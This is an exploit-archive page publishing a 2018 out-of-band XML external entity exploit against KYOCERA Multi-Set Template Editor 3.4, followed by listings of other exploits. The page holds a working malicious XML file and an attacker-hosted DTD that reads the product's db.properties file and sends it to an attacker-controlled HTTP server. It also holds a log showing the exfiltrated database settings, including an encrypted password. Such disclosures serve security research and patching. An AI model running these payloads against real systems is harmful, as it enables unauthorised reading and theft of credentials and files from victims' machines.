Menu

Search for hundreds of thousands of exploits

"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection"

Author

Exploit author

LiquidWorm

Platform

Exploit platform

xml

Release date

Exploit published date

2018-04-09

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
#Vendor: KYOCERA Corporation
#Product https://global.kyocera.com
#Affected version: 3.4.0906
#
#Summary: KYOCERA Net Admin is Kyocera's unified
#device management software that uses a web-based
#platform to give network administrators easy and
#uncomplicated control to handle a fleet for up to
#10,000 devices. Tasks that used to require multiple
#programs or walking to each printer can now be
#accomplished in a single, fast and modern environment.
#
#Desc: KYOCERA Multi-Set Template Editor (part of Net
#Admin) suffers from an unauthenticated XML External Entity
#(XXE) injection vulnerability using the DTD parameter
#entities technique resulting in disclosure and retrieval
#of arbitrary data from the affected node via out-of-band
#(OOB) channel attack. The vulnerability is triggered when
#input passed to the Multi-Set Template Editor (kmmted.exe)
#called by the ActiveX DLL MultisetTemplateEditorActiveXComponent.dll
#is not sanitized while parsing a 5.x Multi-Set template XML
#file.
#
#Tested on: Microsoft Windows 7 Professional SP1 (EN)
# Apache Tomcat/8.5.15
#
#
#Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
#                            
#
#
#Advisory ID: ZSL-2018-5459
#Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5459.php
#
#
#28.03.2018
#
#—
#
#
#Malicious.xml:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ZSL [
<!ENTITY % remote SYSTEM "http://192.168.1.71:7777/xxe.xml">
%remote;
%root;
%oob;]>


Attacker's xxe.xml:

<!ENTITY % fetch SYSTEM "file:///C:\Program Files\Kyocera\NetAdmin\Admin\conf\db.properties">
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://192.168.1.71:7777/?%fetch;'> ">


Data retrieval:

lqwrm@metalgear:~$ python -m SimpleHTTPServer 7777
Serving HTTP on 0.0.0.0 port 7777 ...
192.168.1.71 - - [01/Apr/2018 14:36:15] "GET /xxe.xml HTTP/1.1" 200 -
192.168.1.71 - - [01/Apr/2018 14:36:15] "GET /?db_host=localhost%0D%0Adb_port=5432%0D%0Adb_name=KNETADMINDB%0D%0Adb_driver=pgsql%0D%0Adb_user=postgres%0D%0Adb_password=ENC(4YMilUUDS80QB5rD+Rhn1z89rNXQXxcw)%0D%0Adb_driverClassName=org.postgresql.Driver%0D%0Adb_url=jdbc:postgresql://localhost/KNETADMINDB%0D%0Adb_initialSize=1%0D%0Adb_maxActive=20%0D%0Adb_dialect=org.hibernate.dialect.PostgreSQLDialect HTTP/1.1" 200 -
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-07-07 "Microsoft Windows mshta.exe 2019 - XML External Entity Injection" remote xml hyp3rlinx
2020-05-05 "BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection" webapps xml "Daniel Martinez Adan"
2020-02-07 "ExpertGPS 6.38 - XML External Entity Injection" webapps xml "Trent Gordon"
2020-01-22 "Citrix XenMobile Server 10.8 - XML External Entity Injection" webapps xml "Jonas Lejon"
2020-01-20 "Easy XML Editor 1.7.8 - XML External Entity Injection" local xml "Javier Olmedo"
2020-01-09 "MSN Password Recovery 1.30 - XML External Entity Injection" local xml ZwX
2019-12-04 "Microsoft Visual Basic 2010 Express - XML External Entity Injection" local xml ZwX
2019-12-03 "Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass" local xml hyp3rlinx
2019-12-02 "Visual Studio 2008 - XML External Entity Injection" local xml hyp3rlinx
2019-12-02 "Microsoft Excel 2016 1901 - XML External Entity Injection" local xml hyp3rlinx
Release Date Title Type Platform Author
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)" webapps hardware LiquidWorm
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation" webapps hardware LiquidWorm
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass" webapps hardware LiquidWorm
2020-10-27 "Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root" remote hardware LiquidWorm
2020-10-27 "GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse" remote hardware LiquidWorm
2020-10-27 "TDM Digital Signage PC Player 4.1 - Insecure File Permissions" local windows LiquidWorm
2020-10-26 "ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service" webapps hardware LiquidWorm
2020-10-26 "ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)" webapps hardware LiquidWorm
2020-10-26 "ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure" webapps hardware LiquidWorm
2020-10-26 "ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure" webapps hardware LiquidWorm
2020-10-07 "BACnet Test Server 1.01 - Remote Denial of Service (PoC)" dos windows LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Database Backup Disclosure" webapps hardware LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2020-10-01 "BrightSign Digital Signage Diagnostic Web Server 8.2.26 - File Delete Path Traversal" webapps hardware LiquidWorm
2020-10-01 "BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated)" webapps hardware LiquidWorm
2020-10-01 "Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow" remote hardware LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Username Enumeration" webapps hardware LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure" webapps multiple LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)" webapps multiple LiquidWorm
2020-09-21 "B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution" webapps multiple LiquidWorm
2020-09-14 "Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path" local windows LiquidWorm
2020-08-28 "Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation" webapps hardware LiquidWorm
2020-08-26 "Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal" webapps multiple LiquidWorm
2020-08-24 "Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure" webapps hardware LiquidWorm
2020-08-24 "Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure" webapps hardware LiquidWorm
2020-08-07 "All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected